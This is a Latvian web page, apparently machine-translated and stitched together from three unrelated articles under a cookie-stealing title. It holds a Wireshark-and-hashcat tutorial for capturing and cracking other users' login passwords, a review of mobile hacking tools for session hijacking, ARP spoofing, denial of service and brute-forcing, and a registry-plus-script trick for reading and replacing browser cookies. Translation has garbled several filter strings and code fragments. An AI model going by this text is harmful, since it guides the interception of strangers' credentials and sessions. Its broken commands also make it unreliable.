mājas - Iesācējiem
Programmas sīkfailu zagšanai pēc IP. Cepumu zagšanas veidi

Daudzi lietotāji neapzinās, ka, reģistrējoties vai autorizējoties slēgtā interneta resursā, ievadot pieteikumvārdu un paroli un nospiežot ENTER, šos datus var viegli pārtvert. Ļoti bieži tie tiek pārraidīti tīklā nenodrošinātā veidā. Tāpēc, ja vietne, kurā mēģināt pieteikties, izmanto HTTP protokolu, ir ļoti viegli uztvert šo trafiku un analizēt to, izmantojot izmantojot Wireshark un pēc tam, izmantojot īpašus filtrus un programmas, atrodiet un atšifrējiet paroli.

Vislabākā vieta paroļu pārtveršanai ir tīkla kodols, kur visu lietotāju trafika tiek novirzīta uz slēgtiem resursiem (piemēram, pastu) vai maršrutētāja priekšā, lai piekļūtu internetam, reģistrējoties ārējos resursos. Mēs uzstādām spoguli un esam gatavi justies kā hakeris.

1. darbība. Instalējiet un palaidiet Wireshark, lai uztvertu trafiku

Dažreiz, lai to izdarītu, pietiek atlasīt tikai saskarni, caur kuru plānojam uztvert trafiku, un noklikšķināt uz pogas Sākt. Mūsu gadījumā mēs uzņemam, izmantojot bezvadu tīklu.

Ir sākusies satiksmes fiksēšana.

2. darbība. Uzņemtās POST trafika filtrēšana

Mēs atveram pārlūkprogrammu un mēģinām pieteikties kādā resursā, izmantojot lietotājvārdu un paroli. Kad autorizācijas process ir pabeigts un vietne ir atvērta, mēs pārtraucam Wireshark trafika uztveršanu. Pēc tam atveriet protokola analizatoru un skatiet lielu skaitu pakešu. Šeit lielākā daļa IT speciālistu padodas, jo nezina, ko darīt tālāk. Bet mēs zinām un interesējam par konkrētiem iepakojumiem, kas satur POST dati, kas tiek ģenerēti mūsu vietējā datorā, aizpildot veidlapu ekrānā un nosūtīti uz attālais serveris kad pārlūkprogrammā noklikšķināt uz pogas "Pieteikties" vai "Autorizācija".

Logā ievadām īpašu filtru, lai parādītu uzņemtās paketes: http.pieprasījumu.metode == "POSTĪT"

Un mēs redzam, ka tūkstošiem paku vietā ir tikai viena ar mūsu meklētajiem datiem.

3. darbība. Atrodiet lietotāja pieteikumvārdu un paroli

Ātri noklikšķiniet ar peles labo pogu un atlasiet vienumu izvēlnē Sekojiet TCP Steam


Pēc tam teksts parādīsies jaunā logā, kas atjauno lapas saturu kodā. Atradīsim laukus “password” un “user”, kas atbilst parolei un lietotājvārdam. Dažos gadījumos abi lauki būs viegli salasāmi un pat nešifrēti, taču, ja mēs mēģinām uztvert trafiku, piekļūstot ļoti labi zināmiem resursiem, piemēram, Mail.ru, Facebook, VKontakte utt., tad parole tiks šifrēta:

Atrasts HTTP/1.1 302

Serveris: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV MŪSU OTRo STP IND DEM"

Set-Cookie: parole= ; beidzas=Cet, 07-nov-2024 23:52:21 GMT; ceļš=/

Atrašanās vieta: loggedin.php

Satura garums: 0

Savienojums: aizvērt

Satura veids: teksts/html; charset=UTF-8

Tātad mūsu gadījumā:

Lietotājvārds: networkguru

Parole:

4. darbība. Nosakiet paroles atšifrēšanas kodēšanas veidu

Piemēram, dodieties uz vietni http://www.onlinehashcrack.com/hash-identification.php#res un identifikācijas logā ievadiet mūsu paroli. Man tika dots kodēšanas protokolu saraksts prioritārā secībā:

5. darbība. Lietotāja paroles atšifrēšana

Ieslēgts šajā posmā mēs varam izmantot hashcat utilītu:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Izvadā mēs saņēmām atšifrētu paroli: simplepassword

Tādējādi ar Wireshark palīdzību mēs varam ne tikai atrisināt problēmas lietojumprogrammu un pakalpojumu darbībā, bet arī izmēģināt sevi kā hakeris, pārtverot paroles, kuras lietotāji ievada tīmekļa veidlapās. Varat arī uzzināt paroles lietotāju pastkastēm, izmantojot vienkāršus parādīšanas filtrus:

  • POP protokols un filtrs izskatās šādi: pop.request.command == "LIETOTĀJS" || pop.request.command == "IZIET"
  • IMAP protokols un filtrs būs: imap.request satur "login"
  • SMTP protokols un jums būs jāievada šāds filtrs: smtp.req.command == "AUTH"

un nopietnākas utilītas kodēšanas protokola atšifrēšanai.

6. darbība. Ko darīt, ja trafiks ir šifrēts un izmanto HTTPS?

Ir vairākas iespējas, kā atbildēt uz šo jautājumu.

1. iespēja. Izveidojiet savienojumu, kad savienojums starp lietotāju un serveri tiek pārtraukts, un tveriet trafiku savienojuma izveides brīdī (SSL rokasspiediens). Kad savienojums ir izveidots, sesijas atslēgu var pārtvert.

2. iespēja: varat atšifrēt HTTPS trafiku, izmantojot Firefox vai Chrome ierakstīto sesijas atslēgas žurnālfailu. Lai to izdarītu, pārlūkprogrammai ir jābūt konfigurētai tā, lai šīs šifrēšanas atslēgas tiktu ierakstītas žurnālfailā (piemērs, kas balstīts uz FireFox), un jums ir jāsaņem šis žurnāla fails. Būtībā jums ir jānozag sesijas atslēgas fails cietais disks cits lietotājs (kas ir nelikumīgs). Tad tveriet trafiku un izmantojiet iegūto atslēgu, lai to atšifrētu.

Noskaidrošana. Mēs runājam par tādas personas tīmekļa pārlūkprogrammu, kuras paroli viņi mēģina nozagt. Ja mēs domājam mūsu pašu HTTPS trafika atšifrēšanu un vēlamies praktizēt, tad šī stratēģija darbosies. Ja mēģināt atšifrēt citu lietotāju HTTPS trafiku bez piekļuves viņu datoriem, tas nedarbosies — tā ir gan šifrēšana, gan privātums.

Pēc atslēgu saņemšanas saskaņā ar opciju 1 vai 2, tās jāreģistrē WireShark:

  1. Dodieties uz izvēlni Rediģēt - Preferences - Protocols - SSL.
  2. Iestatiet karogu “Atkārtoti salikt SSL ierakstus, kas aptver vairākus TCP segmentus”.
  3. “RSA atslēgu saraksts” un noklikšķiniet uz Rediģēt.
  4. Ievadiet datus visos laukos un ierakstiet ceļu failā ar atslēgu

“Viedtālrunis ar uzlaušanas rīkiem? Tāda nav,” mēs jums būtu teikuši pavisam nesen. Dažus no parastajiem rīkiem uzbrukumu īstenošanai bija iespējams palaist tikai dažiem Maemo. Tagad daudzi pazīstami rīki ir pārnesti uz iOS un Android, un daži hakeru rīki ir īpaši izstrādāti mobilajai videi. Vai viedtālrunis iespiešanās testos var aizstāt klēpjdatoru? Mēs nolēmām to pārbaudīt.

ANDROID

Android ir populāra platforma ne tikai vienkāršiem mirstīgajiem, bet arī īstajiem cilvēkiem. Šeit noderīgo ][-utilītu skaits vienkārši ir ārpus saraksta. Par to mēs varam pateikties sistēmas UNIX saknēm — tas ir ievērojami vienkāršojis daudzu rīku pārnešanu uz Android. Diemžēl Google neļauj dažus no tiem iekļūt Play veikalā, tāpēc jums būs manuāli jāinstalē atbilstošais APK. Turklāt dažām utilītiem ir nepieciešama maksimāla piekļuve sistēmai (piemēram, iptables ugunsmūris), tāpēc jums vajadzētu iepriekš parūpēties par root piekļuvi. Katrs ražotājs šeit izmanto savu tehnoloģiju, taču nepieciešamo instrukciju atrašana ir diezgan vienkārša. LifeHacker resurss (bit.ly/eWgDlu) ir izveidojis labu HOWTO komplektu. Taču, ja šeit nevar atrast kādu konkrētu modeli, vienmēr palīgā nāk XDA-Developers forums (www.xda-developers.com), kurā var atrast dažādu informāciju praktiski par jebkuru Android tālruņa modeli. Vienā vai otrā veidā dažas no tālāk aprakstītajām utilītprogrammām darbosies bez root piekļuves.

Pakešu pārvaldnieks

BotBrew Sāksim pārskatīšanu ar neparastu pakotņu pārvaldnieku. Izstrādātāji to sauc par “utilītprogrammām superlietotājiem”, un tas nav tālu no patiesības. Pēc BotBrew instalēšanas jūs saņemat repozitoriju, no kura varat lejupielādēt milzīgu skaitu pazīstamu rīku, kas apkopoti operētājsistēmai Android. Starp tiem: Python un Ruby tulki daudzu tajos ierakstītu rīku palaišanai, tcpdump sniffer un Nmap skeneris tīkla analīzei, Git un Subversion darbam ar versiju kontroles sistēmām un daudz kas cits.

Tīkla skeneri

PIPS Tīkla izpētē var noderēt neuzkrītošs viedtālrunis, kas atšķirībā no klēpjdatora viegli iekļaujas kabatā un nekad nerada aizdomas. Mēs jau teicām iepriekš, kā instalēt Nmap, taču ir vēl viena iespēja. PIPS ir Nmap skenera ports, kas īpaši pielāgots operētājsistēmai Android, kaut arī neoficiāls. Tas nozīmē, ka varat ātri atrast tīklā aktīvās ierīces, noteikt to OS, izmantojot pirkstu nospiedumu noņemšanas opcijas, veikt portu skenēšanu — īsi sakot, darīt visu, ko spēj Nmap. Fing Ar Nmap lietošanu, neskatoties uz visu tās jaudu, ir divas problēmas. Pirmkārt, skenēšanas parametri tiek pārsūtīti, izmantojot palaišanas taustiņus, kas jums ne tikai jāzina, bet arī jāspēj ievadīt ar neērtībām. mobilā tastatūra. Un, otrkārt, skenēšanas rezultāti konsoles izvadē nav tik skaidri, kā mēs vēlētos. Fing skenerim nav šo trūkumu, tas ļoti ātri skenē tīklu, noņem pirkstu nospiedumus un pēc tam skaidri parāda visu pieejamo ierīču sarakstu, sadalot tās pēc veida (maršrutētājs, galddators, iPhone un tā tālāk). Tajā pašā laikā katram saimniekdatoram varat ātri apskatīt atvērto portu sarakstu. Turklāt tieši no šejienes jūs varat izveidot savienojumu, teiksim, ar FTP, izmantojot sistēmā instalēto FTP klientu - ļoti ērti. NetAudit Kad runa ir par konkrēta resursdatora analīzi, NetAudit utilīta var būt neaizstājama. Tas darbojas jebkurā Android ierīcē (pat bez saknes) un ļauj ne tikai ātri identificēt ierīces tīklā, bet arī pārbaudīt tās, izmantojot lielu pirkstu nospiedumu datu bāzi, lai identificētu. operētājsistēma, kā arī tīmekļa serverī izmantotās CMS sistēmas. Tagad datu bāzē ir vairāk nekā 3000 digitālo pirkstu nospiedumu. Tīkla rīki Ja, gluži pretēji, jums ir jāstrādā zemākā līmenī un rūpīgi jāpārbauda tīkla darbība, jūs nevarat iztikt bez Net Tools. Tas ir neaizstājams darbā sistēmas administrators utilītu komplekts, kas ļauj pilnībā diagnosticēt tā tīkla darbību, kuram ierīce ir pievienota. Paketē ir vairāk nekā 15 dažādu veidu programmas, piemēram, ping, traceroute, arp, dns, netstat, route.

Satiksmes manipulācijas

Haizivs par sakni Uz tcpdump balstītais sniffer godīgi reģistrē visus datus pcap failā, ko pēc tam var izpētīt, izmantojot pazīstamas utilītas, piemēram, Wireshark vai Network Miner. Tā kā tajā nav ieviestas MITM uzbrukumu iespējas, tas drīzāk ir rīks jūsu trafika analīzei. Piemēram, tas ir lielisks veids, kā izpētīt, kādas programmas, kas instalētas jūsu ierīcē no apšaubāmām krātuvēm, pārraida. FaceNiff Ja mēs runājam par Android kaujas aplikācijām, tad viena no sensacionālākajām ir FaceNiff, kas ievieš pārtveršanu un ievadīšanu pārtvertajās tīmekļa sesijās. Lejupielādējot APK pakotni ar programmu, jūs varat palaist šo uzlaušanas rīku gandrīz jebkurā Android viedtālrunī un, izveidojot savienojumu ar bezvadu tīklu, pārtvert dažādu pakalpojumu kontus: Facebook, Twitter, VKontakte un tā tālāk - vairāk nekā desmit. kopā. Sesijas nolaupīšana tiek veikta, izmantojot ARP viltošanas uzbrukumu, taču uzbrukums ir iespējams tikai neaizsargātiem savienojumiem (FaceNiff nespēj iejaukties SSL trafikā). Lai ierobežotu scriptdis plūsmu, autors ierobežoja maksimālo sesiju skaitu līdz trim - tad jums ir jāsazinās ar izstrādātāju, lai iegūtu īpašu aktivizācijas kodu. DroidSheep Ja FaceNiff radītājs vēlas naudu par tā izmantošanu, tad DroidSheep ir pilnīgi bezmaksas rīks ar tādu pašu funkcionalitāti. Tiesa, oficiālajā vietnē izplatīšanas komplektu neatradīsit (tas ir saistīts ar Vācijas skarbajiem likumiem par drošības utilītiem), taču internetā to var atrast bez problēmām. Lietderības galvenais uzdevums ir pārtvert populāras lietotāju tīmekļa sesijas sociālie tīkli, kas ieviesta, izmantojot to pašu ARP Spoofing. Bet ar droši savienojumi problēmas: tāpat kā FaceNiff, DroidSheep kategoriski atsakās strādāt ar HTTPS protokolu. Tīkla spooferis Šī utilīta arī parāda atvērto bezvadu tīklu nedrošību, taču nedaudz citā līmenī. Tas nepārtver lietotāju sesijas, bet ļauj HTTP trafikam iziet cauri sev, izmantojot viltošanas uzbrukumu, veicot noteiktas manipulācijas ar to. Sākot no parastām palaidnībām (visu vietnē esošo bilžu aizstāšana ar trollfaces, visu attēlu apgriešana vai, teiksim, Google rezultātu aizstāšana) un beidzot ar pikšķerēšanas uzbrukumiem, kad lietotājam tiek izdalītas viltus lapas no tādiem populāriem pakalpojumiem kā facebook.com, linkedin .com, vkontakte.ru un daudzi citi. Anti (zImperium LTD Android tīkla rīkkopa)
Ja jautājat, kura Android uzlaušanas utilīta ir visspēcīgākā, tad Anti, visticamāk, nav konkurentu. Šis ir īsts hakeru kombains. Programmas galvenais uzdevums ir skenēt tīkla perimetru. Tālāk cīņā stājas dažādi moduļi, ar kuru palīdzību tiek realizēts vesels arsenāls: satiksmes noklausīšanās, MITM uzbrukumu veikšana un atrasto ievainojamību izmantošana. Tiesa, ir arī trūkumi. Pirmais, kas krīt acīs, ir tas, ka ievainojamību ekspluatācija tiek veikta tikai no centrālā programmu servera, kas atrodas internetā, kā rezultātā var aizmirst mērķi, kuriem nav ārējās IP adreses.

Satiksmes tunelēšana

Kopējais komandieris Plaši pazīstams failu menedžeris tagad viedtālruņos! Tāpat kā darbvirsmas versijā, ir arī spraudņu sistēma savienojuma izveidei ar dažādiem tīkla direktorijiem, kā arī kanoniskais divu paneļu režīms - īpaši ērti planšetdatoros. SSH tunelis Labi, bet kā jūs varat nodrošināt savu datu drošību, kas tiek pārsūtīti atklātā bezvadu tīklā? Papildus VPN, ko Android atbalsta jau no iepakojuma, varat izveidot SSH tuneli. Šim nolūkam ir brīnišķīga SSH Tunnel utilīta, kas ļauj maršrutēt atlasīto lietojumprogrammu trafiku vai visu sistēmu kopumā caur attālo SSH serveri. ProxyDroid Bieži vien ir nepieciešams nosūtīt trafiku, izmantojot starpniekserveri vai SOX, un šajā gadījumā ProxyDroid palīdzēs. Tas ir vienkārši: jūs izvēlaties, kuras lietojumprogrammas trafiku vēlaties tunelēt, un norādiet starpniekserveri (tiek atbalstīts HTTP/HTTPS/SOCKS4/SOCKS5). Ja ir nepieciešama autorizācija, ProxyDroid to atbalsta arī. Starp citu, konfigurāciju var saistīt ar konkrētu bezvadu tīkls, paveicis dažādi iestatījumi katram no tiem.

Bezvadu tīkls

Wifi analizators Iebūvētais bezvadu tīkla pārvaldnieks nav īpaši informatīvs. Ja vēlaties ātri iegūt pilnīgu priekšstatu par tuvumā esošajiem piekļuves punktiem, Wifi Analyzer utilīta ir lieliska izvēle. Tas ne tikai parādīs visus tuvumā esošos piekļuves punktus, bet arī parādīs kanālu, kurā tie darbojas, to MAC adresi un, pats galvenais, izmantotās šifrēšanas veidu (redzot kārotos burtus “WEP”, varam pieņemt, ka piekļuve tiek nodrošināts drošs tīkls). Turklāt utilīta ir ideāla, ja, pateicoties vizuālam signāla stipruma indikatoram, jums ir jāatrod, kur fiziski atrodas vēlamais piekļuves punkts. WiFiKill Šī utilīta, kā norāda tās izstrādātājs, var būt noderīga, ja bezvadu tīkls ir pilnībā piepildīts ar klientiem, kuri izmanto visu kanālu, un tieši šajā brīdī jums ir nepieciešams labs savienojums un stabils savienojums. WiFiKill ļauj atvienot klientus no interneta vai nu selektīvi, vai pēc noteikta kritērija (piemēram, ir iespējams izjokot visus Yabloko dalībniekus). Programma vienkārši veic ARP viltošanas uzbrukumu un novirza visus klientus uz sevi. Šis algoritms ir muļķīgi vienkārši ieviests, pamatojoties uz iptables. Šis ir ātrās ēdināšanas bezvadu tīklu vadības panelis :).

Tīmekļa lietojumprogrammu audits

HTTP vaicājumu veidotājs Manipulēšana ar HTTP pieprasījumiem no datora ir vienkārša, šim nolūkam ir pieejams milzīgs skaits utilītu un pārlūkprogrammas spraudņu. Viedtālruņa gadījumā viss ir nedaudz sarežģītāk. HTTP Query Builder palīdzēs nosūtīt pielāgotu HTTP pieprasījumu ar nepieciešamajiem parametriem, piemēram, vēlamo sīkfailu vai mainītu lietotāja aģentu. Pieprasījuma rezultāts tiks parādīts standarta pārlūkprogrammā. Maršrutētājs Brute Force ADS 2 Ja vietne ir aizsargāta ar paroli, izmantojot pamata piekļuves autentifikāciju, varat pārbaudīt tās uzticamību, izmantojot utilītu Router Brute Force ADS 2. Sākotnēji utilīta tika izveidota, lai maršrutētāja administratora panelī izspiestu paroles, taču ir skaidrs, ka to var veikt. izmanto pret jebkuru citu resursu ar līdzīgu aizsardzību. Lietderība darbojas, taču ir acīmredzami neapstrādāta. Piemēram, izstrādātājs neparedz brutālu spēku, bet tikai brutālu spēku, izmantojot vārdnīcu. AndDOSid Noteikti esat dzirdējuši par tik sensacionālu tīmekļa serveru atspējošanas programmu kā Slowloris. Tās darbības princips ir izveidot un noturēt maksimālo savienojumu skaitu ar attālo tīmekļa serveri, tādējādi neļaujot tam pieslēgties jauniem klientiem. Tātad, AnDOSid ir Slowloris analogs tieši jūsu Android ierīcē! Atklāšu noslēpumu, lai nodrošinātu, pietiek ar diviem simtiem savienojumu nestabils darbs viena no ceturtajām vietnēm, kurās darbojas Apache tīmekļa serveris. Un tas viss - no jūsu tālruņa!

Dažādi komunālie pakalpojumi

Kodēt Strādājot ar daudzām tīmekļa lietojumprogrammām un analizējot to loģiku, diezgan bieži rodas dati, kas tiek pārraidīti kodētā veidā, proti, Base64. Kodēt palīdzēs jums atšifrēt šos datus un redzēt, kas tieši tajos tiek glabāts. Iespējams, aizstājot citātus, kodējot tos atpakaļ Base64 un aizstājot tos pētāmās vietnes URL, jūs iegūsit kāroto datu bāzes vaicājuma kļūdu. HexEditor Ja nepieciešams hex redaktors, tad tas ir pieejams arī Android ierīcēm. Izmantojot HexEditor, varat rediģēt jebkurus failus, tostarp sistēmas failus, ja paaugstināsit programmas tiesības uz superlietotāju. Lielisks standarta teksta redaktora aizstājējs, kas ļauj viegli atrast vajadzīgo teksta daļu un to mainīt.

Attālā piekļuve

ConnectBot Piekļuve uz attālo saimniekdatoru, jums ir jāprot to izmantot. Un šim nolūkam mums ir vajadzīgi klienti. Sāksim ar SSH, kur ConnectBot jau ir de facto standarts. Turklāt lietotājam draudzīgs interfeiss, nodrošina iespēju organizēt drošus tuneļus, izmantojot SSH savienojumus. PocketCloud Remote RDP/VNC Noderīga programma, kas ļauj izveidot savienojumu ar attālo darbvirsmu, izmantojot RDP vai VNC pakalpojumus. Es ļoti priecājos, ka šie ir divi klienti, nav nepieciešams izmantot dažādus rīkus RDP un VNC. SNMP MIB pārlūks Speciāli rakstīts priekš Android pārlūkprogramma MIB, ar kuru varat pārvaldīt tīkla ierīces, izmantojot SNMP protokols. Tas var būt noderīgi, lai izstrādātu uzbrukuma vektoru dažādiem maršrutētājiem, jo ​​standarta kopienas virkne (citiem vārdiem sakot, piekļuves parole) pārvaldībai, izmantojot SNMP, vēl nav atcelta.

iOS

IOS platforma ir ne mazāk populāra drošības utilītu izstrādātāju vidū. Bet, ja gadījumā Android tiesības Lai gan sakne bija nepieciešama tikai dažām lietojumprogrammām, Apple ierīcēs gandrīz vienmēr ir nepieciešama jailbreak. Par laimi, pat jaunākajai iDevices programmaparatūrai (5.1.1) jau ir jailbreak rīks. Kopā ar pilnu piekļuvi jūs saņemat arī alternatīvu lietojumprogrammu pārvaldnieku Cydia, kurā jau ir daudz utilītu.

Darbs ar sistēmu

Mobilais terminālis Pirmā lieta, ar ko es vēlos sākt, ir termināļa instalēšana. Acīmredzamu iemeslu dēļ tas nav iekļauts mobilās OS standarta piegādē, taču mums tas būs nepieciešams, lai palaistu konsoles utilītas, par kurām mēs runāsim tālāk. Labākā termināļa emulatora ieviešana ir MobileTerminal - tas atbalsta vairākus termināļus, vadības žestus (piemēram, Control-C nosūtīšanai) un kopumā ir iespaidīgs ar savu pārdomātību. iSSH Vēl viens, vēl grūts variants iegūstiet piekļuvi ierīces konsolei - instalējiet tajā OpenSSH (tas tiek darīts, izmantojot Cydia) un izveidojiet savienojumu ar to lokāli, izmantojot SSH klientu. Ja izmantojat pareizo klientu, piemēram, iSSH, kuram ir pārsteidzoša skārienekrāna vadība, šī metode ir vēl ērtāka nekā MobileTerminal.

Datu pārtveršana

Pirni & Pirni Pro Tagad, kad jums ir piekļuve konsolei, varat izmēģināt utilītas. Sāksim ar Pirni, kas iegāja vēsturē kā pilnvērtīgs iOS snifers. Diemžēl ierīcē iebūvēto strukturāli ierobežoto Wi-Fi moduli nevar pārslēgt uz parastai datu pārtveršanai nepieciešamo izlaidības režīmu. Tātad, lai pārtvertu datus, tiek izmantota klasiskā ARP viltošana, ar kuras palīdzību visa trafika tiek nodota caur pašu ierīci. No konsoles tiek palaista utilīta standarta versija, kurā papildus MITM uzbrukuma parametriem tiek norādīts PCAP faila nosaukums, kurā tiek reģistrēta visa trafika. Lietderībai ir uzlabota versija - Pirni Pro, kas lepojas ar grafisko interfeisu. Turklāt tā var lidojuma laikā parsēt HTTP trafiku un pat automātiski no turienes izvilkt interesantus datus (piemēram, pieteikumvārdus un paroles), izmantojot regulāras izteiksmes, kas ir iestatīti iestatījumos. Intercepter-NG (konsoles izdevums) Pazīstamajam sniferim Intercepter-NG, par kuru esam vairākkārt rakstījuši, nesen ir konsoles versija. Kā saka autors, lielākā daļa koda ir rakstīta tīrā ANSI C, kas gandrīz jebkurā vidē uzvedas vienādi, tāpēc konsoles versija jau no paša sākuma darbojās gan uz desktop Windows, Linux un BSD, gan uz mobilās platformas, tostarp iOS un Android. Konsoles versijā jau ir ieviesta paroļu satveršana, kas tiek pārraidīta, izmantojot dažādus protokolus, tūlītējās ziņojumapmaiņas ziņojumu pārtveršana (ICQ/Jabber un daudzi citi), kā arī failu atkopšana no trafika (HTTP/FTP/IMAP/POP3/SMTP/SMB). Tajā pašā laikā ir pieejamas tīkla skenēšanas funkcijas un augstas kvalitātes ARP Poison. Lai darbotos pareizi, vispirms ir jāinstalē libpcap pakotne, izmantojot Cydia (neaizmirstiet iestatījumos iespējot izstrādes pakotnes). Visi startēšanas norādījumi ir saistīti ar pareizo tiesību iestatīšanu: chmod +x intercepter_ios. Pēc tam, ja palaižat sniffer bez parametriem, parādīsies skaidrs interaktīvs Itercepter interfeiss, kas ļaus jums uzsākt jebkādus uzbrukumus. Ettercap-NG Grūti noticēt, taču šis izsmalcinātais rīks MITM uzbrukumu ieviešanai beidzot tika pārnests uz iOS. Pēc milzīga darba apjoma mums izdevās izveidot pilnvērtīgu mobilo portu. Lai glābtu sevi no dejošanas ar tamburīnu ap atkarībām paškompilācijas laikā, labāk ir instalēt jau uzbūvētu pakotni, izmantojot Cydia, pēc tam, kad datu avotam ir pievienota theworm.altervista.org/cydia (TWRepo repozitorijs). IN iekļauts un etterlog utilīta, kas palīdz iegūt dažāda veida noderīgu informāciju no savāktās trafika izgāztuves (piemēram, FTP piekļuves konti).

Bezvadu tīkla analīze

WiFi analizators Vecā iOS versijas amatniekiem radās gaisa plaisa un varēja salauzt WEP atslēgu, taču mēs pārbaudījām: programma nedarbojas jaunās ierīcēs. Tāpēc, lai pētītu Wi-Fi, mums būs jāapmierinās tikai ar Wi-Fi skeneriem. WiFi analizators Analizē un parāda informāciju par visiem pieejamajiem 802.11 tīkliem, tostarp informāciju par SSID, kanāliem, piegādātājiem, MAC adresēm un šifrēšanas veidiem. Lietderība veido vizuālus grafikus reāllaikā, pamatojoties uz ēterā esošajiem datiem. Ar šādu programmu ir viegli atrast punkta fizisko atrašanās vietu, ja to pēkšņi aizmirstat, un, piemēram, apskatīt WPS PIN, kas var noderēt pieslēgšanai.

Tīkla skeneri

Scany Kādu programmu izmanto jebkurš pentesters jebkur pasaulē neatkarīgi no mērķiem un uzdevumiem? Tīkla skeneris. Un iOS gadījumā tas, visticamāk, būs visspēcīgākais Scany rīku komplekts. Pateicoties iebūvēto utilītu komplektam, varat ātri iegūt detalizētu priekšstatu par tīkla ierīces ak un, piemēram, atvērtās ostas. Turklāt pakotnē ir iekļautas tīkla testēšanas utilītas, piemēram, ping, traceroute, nslookup. Fing Tomēr daudzi cilvēki dod priekšroku Fing. Skenerim ir diezgan vienkārša un ierobežota funkcionalitāte, taču ar to pilnīgi pietiek pirmajai iepazīšanai ar, teiksim, kafejnīcas tīklu :). Rezultāti parāda informāciju par pieejamajiem pakalpojumiem attālajās iekārtās, MAC adresēm un resursdatora nosaukumiem, kas savienoti ar skenēto tīklu. Nikto Šķiet, ka visi ir aizmirsuši par Nikto, bet kāpēc? Galu galā jūs varat viegli instalēt šo tīmekļa ievainojamības skeneri, kas rakstīts skriptu valodā (proti, Perl), izmantojot Cydia. Tas nozīmē, ka varat to viegli palaist savā jailbroken ierīcē no termināļa. Nikto ar prieku sniegs jums Papildus informācija pārbaudītajā tīmekļa resursā. Turklāt jūs varat pievienot savus meklēšanas parakstus tās zināšanu datubāzei ar savām rokām. sqlmap Šis spēcīgs instruments SQL ievainojamību automātiskai izmantošanai tas ir rakstīts Python valodā, kas nozīmē, ka pēc tulka instalēšanas varat to viegli izmantot tieši no savas mobilās ierīces.

Tālvadība

SNMP skenēšana Daudzas tīkla ierīces (tostarp dārgi maršrutētāji) tiek pārvaldītas, izmantojot SNMP protokolu. Šī utilīta ļauj skenēt pieejamos SNMP pakalpojumu apakštīklus ar iepriekš zināmām kopienas virkņu vērtībām (citiem vārdiem sakot, standarta paroles). Ņemiet vērā, ka SNMP pakalpojumu meklēšana, izmantojot standarta kopienas virknes (publisku/privātu), lai piekļūtu ierīču pārvaldībai, ir neatņemama jebkura iespiešanās testa sastāvdaļa, kā arī paša perimetra identificēšana un pakalpojumu identificēšana. iTap mobilais RDP / iTap mobilais VNC Divas viena ražotāja utilītas ir paredzētas, lai izveidotu savienojumu ar attālo darbvirsmu, izmantojot RDP un VNC protokolus. Līdzīgi komunālie pakalpojumi Aplikāciju veikals To ir daudz, bet tie ir īpaši ērti lietojami.

Paroles atkopšana

Hidra Leģendārā programma, kas palīdz miljoniem hakeru visā pasaulē “atcerēties” savu paroli, ir pārnesta uz iOS. Tagad jūs varat meklēt paroles tādiem pakalpojumiem kā HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 un daudziem citiem tieši no sava iPhone. Tiesa, efektīvākam uzbrukumam labāk uzkrāt labas brutālā spēka vārdnīcas. Paiet garām Mūlim Ikviens no pirmavotiem zina lietošanas ievainojamību standarta paroles. Pass Mule ir sava veida direktorija, kurā ir visa veida standarta pieteikšanās un paroles tīkla ierīcēm. Tie ir ērti sakārtoti pēc pārdevēja nosaukuma, produkta un modeļa, tāpēc atrast vajadzīgo nebūs grūti. Programma drīzāk ir izstrādāta, lai ietaupītu laiku, meklējot maršrutētāja rokasgrāmatu, standarta pieteikumvārdu un paroli, kas jums jānoskaidro.

Ievainojamību izmantošana

Metasploit
Ir grūti iedomāties vairāk uzlaušanas utilītu nekā Metasploit, un tas noslēdz mūsu šodienas apskatu. Metasploit ir dažādu rīku pakete, kuras galvenais uzdevums ir izmantot ievainojamības programmatūra. Iedomājieties: apmēram 1000 uzticamu, pārbaudītu un nepieciešamu varoņdarbu pentestera ikdienā — tieši jūsu viedtālrunī! Ar šāda rīka palīdzību jūs patiešām varat nostiprināties jebkurā tīklā. Metasploit ļauj ne tikai izmantot nepilnības servera lietojumprogrammās – ir pieejami arī rīki, lai uzbruktu klientu lietojumprogrammām (piemēram, izmantojot Browser Autopwn moduli, kad klienta trafikā tiek ievietota kaujas slodze). Šeit gan jāsaka, ka mobilā versija Rīku komplekta nav, taču varat instalēt standarta pakotni Apple ierīcē, izmantojot .

Kas ir cepums?

Ir mehānisms, kas ļauj http serverim saglabāt daļu teksta informācijas lietotāja datorā un pēc tam piekļūt tai. Šī informācija sauc par cepumu. Būtībā katrs sīkfails ir pāris: parametra nosaukums un tā vērtība. Katram sīkfailam tiek piešķirts arī domēns, kuram tas pieder. Drošības apsvērumu dēļ visās pārlūkprogrammās http serverim ir atļauts piekļūt tikai sava domēna sīkfailam. Turklāt sīkfailiem var būt derīguma termiņš, un tādā gadījumā tie tiks saglabāti datorā līdz šim datumam, pat ja aizverat visus pārlūkprogrammas logus.


Kāpēc sīkfaili ir svarīgi?

Visas vairāku lietotāju sistēmas izmanto sīkfailus, lai identificētu lietotāju. Precīzāk, lietotāja pašreizējais savienojums ar pakalpojumu, lietotāja sesija. Ja kāds atpazīs jūsu sīkfailus, viņš varēs pieteikties sistēmā jūsu vārdā. Tā kā iekšā pašlaikļoti maz interneta resursu pārbauda IP adreses izmaiņas vienas lietotāja sesijas laikā.


Kā nomainīt vai aizstāt sīkfailus?

Pārlūkprogrammu izstrādātāji nenodrošina iebūvētus rīkus sīkfailu rediģēšanai. Bet jūs varat iztikt ar parasto piezīmju grāmatiņu.


1. darbība: izveidojiet teksta fails ar tekstu

Windows reģistra redaktora versija 5.00



@="C:\\IE_ext.htm"

Saglabājiet to ar nosaukumu IE_ext.reg

2. darbība. Izmantojot izveidoto failu, pievienojiet izmaiņas Windows reģistrā.

3. darbība: izveidojiet teksta failu ar tekstu

< script valoda = "javascript">
external.menuArguments.clipboardData.setData("Teksts" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


Saglabājiet to ar nosaukumu C:\IE_ext.htm

4. darbība: dodamies uz mūs interesējošo vietni.

5. darbība: ar peles labo pogu noklikšķiniet uz tukšas vietas lapā un atlasiet izvēlnes vienumu "Darbs ar sīkfailiem". Atļaujiet piekļuvi starpliktuvei. Jūsu šī sīkfails tīmekļa vietne. Varat ievietot viņu piezīmju grāmatiņu un apskatīt.


